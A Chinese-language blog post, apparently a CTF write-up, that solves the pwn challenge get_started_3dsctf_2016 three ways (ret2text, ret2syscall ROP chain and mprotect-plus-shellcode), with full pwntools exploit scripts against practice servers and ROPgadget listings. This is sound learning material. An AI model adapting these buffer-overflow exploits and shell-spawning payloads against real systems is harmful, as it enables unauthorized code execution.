<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Pwn_get_started_3dsctf_2016 | f1r3K0&#39;s Blog | 欲买桂花同载酒</title>

  
  <meta name="author" content="K">
  

  
  <meta name="description" content="最近就是飞来飞去打了一些比赛，基于DBus挖了一些有意思的本地提权，很久没PWN了！">
  

  
  
  <meta name="keywords" content="pwn">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="Pwn_get_started_3dsctf_2016"/>

  <meta property="og:site_name" content="f1r3K0&#39;s Blog"/>

  
  <meta property="og:image" content="/icon.png"/>
  

  <link href="/icon.png" type="image/png" rel="icon">
  <link rel="alternate" href="/atom.xml" title="f1r3K0&#39;s Blog" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  
  <link href="https://fonts.lug.ustc.edu.cn/css?family=Lato|Rubik" rel="stylesheet">
  <script src="/js/pangu-407.min.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head>
<script>
  document.addEventListener('DOMContentLoaded', () => {
    pangu.autoSpacingPage();
  });
</script>
<script type="text/javascript" src="/js/search.js"></script>
<script type="text/javascript" src="/js/jquery.min.js"></script>


<body>
<div class="blog">
  <div class="content">
    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/">f1r3K0&#39;s Blog</a>
    </h1>
    <p class="site-description">欲买桂花同载酒</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
        <li><a href="/">主页</a></li>
      
        <li><a href="/archives">归档</a></li>
      
        <li><a href="/categories">分类</a></li>
      
        <li><a href="/about">关于</a></li>
      
    </ul>
  </nav>
</header>
    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>Pwn_get_started_3dsctf_2016</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2024/12/06/Pwn-get-started-3dsctf-2016/" rel="bookmark">
        <time class="entry-date published" datetime="2024-12-06T07:27:06.000Z">
          2024-12-06
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        

<script type="text/javascript">
    function convertRemToPixels(rem) {    
        return rem * parseFloat(getComputedStyle(document.documentElement).fontSize);
    }
    window.onscroll = function() {
        var scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
        if (scrollTop > convertRemToPixels(40)) {
            document.getElementsByClassName('toc-article')[0].style.visibility = 'visible';
        } else {
            document.getElementsByClassName('toc-article')[0].style.visibility = 'hidden';
        }
    }
</script>


<div id="toc" class="toc-article">
      <div class="toc-content">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%89%8D%E8%A8%80"><span class="toc-text">1.前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%AD%A3%E5%B8%B8%E8%A7%A3%E6%B3%95ret2text"><span class="toc-text">2.正常解法ret2text</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E7%AC%AC%E4%BA%8C%E7%A7%8D%E8%A7%A3%E6%B3%95ret2syscall"><span class="toc-text">3.第二种解法ret2syscall</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%AC%AC%E4%B8%89%E7%A7%8D%E8%A7%A3%E6%B3%95"><span class="toc-text">4.第三种解法</span></a></li></ol>
      </div>
</div>
<style>
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>



        <p>最近就是飞来飞去打了一些比赛，基于DBus挖了一些有意思的本地提权，很久没PWN了！</p>
<span id="more"></span>

<h2 id="1-前言"><a href="#1-前言" class="headerlink" title="1.前言"></a>1.前言</h2><p>拿到这道题以为是一道简单不能再简单的ret2text，事实证明我年轻了…</p>
<h2 id="2-正常解法ret2text"><a href="#2-正常解法ret2text" class="headerlink" title="2.正常解法ret2text"></a>2.正常解法ret2text</h2><p>main函数开头就是使用esp寻址，函数开头没有常规的push ebp mov ebp esp操作，说明这题是外平栈，外平栈一般使用esp+x辅助定位，内平栈则是ebp-x辅助定位</p>
<p><img src="/img/image-20241206110801157.png" alt="image-20241206110801157"></p>
<p>因此这题算偏移时就是0x38，无需+4</p>
<p><img src="/img/image-20241206112142717.png" alt="image-20241206112142717"></p>
<p>另一个坑点是fopen函数打开flag.txt后需要标准输出，因此需要调用fflush()或者exit()</p>
<p>随后直接按照常规ret2text即可，劫持到fopen这里直接绕过判断</p>
<p><img src="/img/image-20241206114544864.png" alt="image-20241206114544864"></p>
<p>照理说这里没有意外，可是出了一些玄学意外</p>
<p>所以我这里还是按出题者思路去构造if绕过打成了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>, arch = <span class="string">&#x27;i386&#x27;</span>, log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./get_started_3dsctf_2016&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25129</span>)</span><br><span class="line"></span><br><span class="line">get_flag_addr = <span class="number">0x080489A0</span></span><br><span class="line">exit_addr = <span class="number">0x804E6A0</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x38</span>+p32(get_flag_addr)+p32(exit_addr)+p32(<span class="number">814536271</span>)+p32(<span class="number">425138641</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="3-第二种解法ret2syscall"><a href="#3-第二种解法ret2syscall" class="headerlink" title="3.第二种解法ret2syscall"></a>3.第二种解法ret2syscall</h2><p>利用ROPgadget寻找system、&#x2F;bin&#x2F;sh这些发现都没有，打libc太麻烦，用系统调用+可写地址自己写bin&#x2F;sh</p>
<p>先找pop eax</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">0x0809e0fa : pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x080b91e6 : pop eax ; ret</span><br><span class="line">0x0804c56d : pop eax ; ret 0x80e</span><br><span class="line">0x080d9ff8 : pop eax ; ret 0xfff7</span><br><span class="line">0x080dfcd8 : pop eax ; ret 0xfff9</span><br><span class="line">0x0809e0f9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br></pre></td></tr></table></figure>

<p>0x080b91e6 : pop eax ; ret</p>
<p>再找pop ebx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">0x080481ad : pop ebx ; ret</span><br><span class="line">0x080d413c : pop ebx ; ret 0x6f9</span><br><span class="line">0x08099f96 : pop ebx ; ret 8</span><br><span class="line">0x0806fc31 : pop ecx ; pop ebx ; ret</span><br><span class="line">0x08063adb : pop edi ; pop esi ; pop ebx ; ret</span><br><span class="line">0x0806fc30 : pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">0x0809e0f9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0807b1b0 : pop es ; pop ebx ; ret</span><br><span class="line">0x0806fc08 : pop esi ; pop ebx ; pop edx ; ret</span><br><span class="line">0x0805d090 : pop esi ; pop ebx ; ret</span><br><span class="line">0x0805b8a0 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x0809efe2 : pop ss ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br></pre></td></tr></table></figure>

<p>0x0806fc30 : pop edx ; pop ecx ; pop ebx ; ret</p>
<p>找可写地址，借一下别人的图</p>
<p><img src="/img/image-20241206123613968.png" alt="image-20241206123613968"></p>
<p>&#x2F;sh&#x2F;x00需要写在它的后四位。即”0x080eb020+4“，最后需要填入int 0x80：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x0806d7e5 : int 0x80</span><br></pre></td></tr></table></figure>

<p>最后exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">    io = process(<span class="string">&#x27;./get_started_3dsctf_2016&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29252</span>)</span><br><span class="line"></span><br><span class="line">pop_eax_ret = <span class="number">0x080b91e6</span></span><br><span class="line">pop_edx_ecx_ebx_ret = <span class="number">0x0806fc30</span></span><br><span class="line">int80 = <span class="number">0x0806d7e5</span></span><br><span class="line">mov_edx_eax_ret = <span class="number">0x080557ab</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">56</span>+p32(pop_eax_ret)+<span class="string">&#x27;/bin&#x27;</span>+p32(pop_edx_ecx_ebx_ret)+p32(<span class="number">0x080eb020</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(mov_edx_eax_ret)</span><br><span class="line">payload += p32(pop_eax_ret)+<span class="string">&#x27;/sh\x00&#x27;</span>+p32(pop_edx_ecx_ebx_ret)+p32(<span class="number">0x080eb020</span>+<span class="number">4</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(mov_edx_eax_ret)</span><br><span class="line">payload += p32(pop_eax_ret)+p32(<span class="number">0xb</span>)+p32(pop_edx_ecx_ebx_ret)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x080eb020</span>)+p32(int80)</span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="4-第三种解法"><a href="#4-第三种解法" class="headerlink" title="4.第三种解法"></a>4.第三种解法</h2><p>执行完mprotect函数后返回read函数，从输入端读取<code>mprotect_len</code>长度的内容放入到<code>mprotect_addr</code>。最后传入shellcode即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./get_started_3dsctf_2016&#x27;</span>)</span><br><span class="line"></span><br><span class="line">local = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">    io = process(<span class="string">&#x27;./get_started_3dsctf_2016&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26854</span>)</span><br><span class="line"></span><br><span class="line">mprotect_addr = <span class="number">0x806EC80</span></span><br><span class="line">mprotect_start = <span class="number">0x080ea000</span></span><br><span class="line">mprotect_len = <span class="number">0x64</span></span><br><span class="line">mprotect_proc = <span class="number">0x7</span></span><br><span class="line"></span><br><span class="line">pop_edx_ecx_ebx = <span class="number">0x0806fc30</span></span><br><span class="line"></span><br><span class="line">read_addr = elf.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.i386.linux.sh())</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span>+p32(mprotect_addr)+p32(pop_edx_ecx_ebx)+p32(mprotect_start)+p32(mprotect_len)+p32(mprotect_proc)</span><br><span class="line">payload += p32(read_addr)+p32(pop_edx_ecx_ebx)+p32(<span class="number">0</span>)+p32(mprotect_start)+p32(mprotect_len)+p32(mprotect_start)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(shellcode)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>二进制太难了~</p>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    
      

    <span class="post-categories">
      <i class="icon-categories"></i>
        <a href="/categories/CTF/">CTF</a>
    </span>
    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/tags/pwn/">pwn</a>
    </span>
    

    </div>

    
  </div>
</article>

  



	<section id="comment" class="comment">
	  <div id="disqus_thread">
	  <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
	  </div>
	</section>

	<script type="text/javascript">
	var disqus_shortname = 'kkkstart';
	(function(){
	  var dsq = document.createElement('script');
	  dsq.type = 'text/javascript';
	  dsq.async = true;
	  dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
	  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
	}());
	(function(){
	  var dsq = document.createElement('script');
	  dsq.type = 'text/javascript';
	  dsq.async = true;
	  dsq.src = '//' + disqus_shortname + '.disqus.com/count.js';
	  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
	}());
	</script>




    </main>
    <footer class="site-footer">
  <p class="site-info">
    </br>
    
    &copy; 2025 K
    
  </p>
</footer>
    
<script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', 'G-S3VKWWDN0Q', 'auto');
    ga('send', 'pageview');

</script>

    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
          tex2jax: {
            inlineMath: [ ['$','$'], ["\\(","\\)"] ],
            processEscapes: true
          }
        });
      </script>
    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
            tex2jax: {
              skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
            }
          });
      </script>
    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
              var all = MathJax.Hub.getAllJax(), i;
              for(i=0; i < all.length; i += 1) {
                  all[i].SourceElement().parentNode.className += ' has-jax';
              }
          });
      </script>
    
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
    </script>
    
  </div>
</div>
</body>
</html>